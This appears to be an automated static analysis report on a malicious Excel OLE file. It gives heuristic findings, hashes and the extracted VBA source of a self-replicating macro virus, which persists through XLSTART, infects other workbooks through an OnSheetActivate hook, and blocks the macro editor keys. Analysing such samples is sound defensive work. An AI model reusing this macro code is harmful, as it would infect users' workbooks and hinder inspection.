Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 15b6e036555a1908…

MALICIOUS

Office (OLE)

622.0 KB Created: 1999-11-17 14:22:03 First seen: 2012-09-15
MD5: e1313e1fbeaa23f505b7a77d88b3b3c7 SHA-1: ac931ba90ec19c670a89718a1cb3e75d8066b31c SHA-256: 15b6e036555a1908c016854676d9c4f2e181642f4c679929fa3329b23589eafa
214 Risk Score

Heuristics 9

  • Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGE
    A valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
      If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
      Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  • VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASION
    The macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.
    Matched line in script
      Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 2 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/pdf/1.3/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14991 bytes
SHA-256: a1dc6565f594763739a73d9b244b8a959e8a2d76ac3b16140efdecc9b54ca3b1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_2"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_3"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_4"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_5"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_6"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_7"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_8"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_9"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_10"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "StartUp_11"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006ㄗ攣ㄘ.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnKey "%{F11}", "1006ㄗ攣ㄘ.xls!escape"
  Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "1006ㄗ攣ㄘ.xls!acop"
  Workbooks.Open Application.StartupPath & "\1006ㄗ攣ㄘ.xls"
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
icc_00_off000004d1.icc pdf-icc-profile PDF ICC profile at offset 0x4D1 3144 bytes
SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e
polyglot_child_pdf_off00001000.pdf polyglot-child-pdf Secondary PDF body inside ole container at offset 0x1000 632832 bytes
SHA-256: 0c37d02a722341d6638b530ed25fa9224519bb6a68fa5000b0f304360a86c995
polyglot_child_pdf_off00015c00.pdf polyglot-child-pdf Secondary PDF body inside ole container at offset 0x15C00 547840 bytes
SHA-256: e69a3d39ed5206852d8f187a358b30b9cfc35cc175b99075e7884ac7586a4c81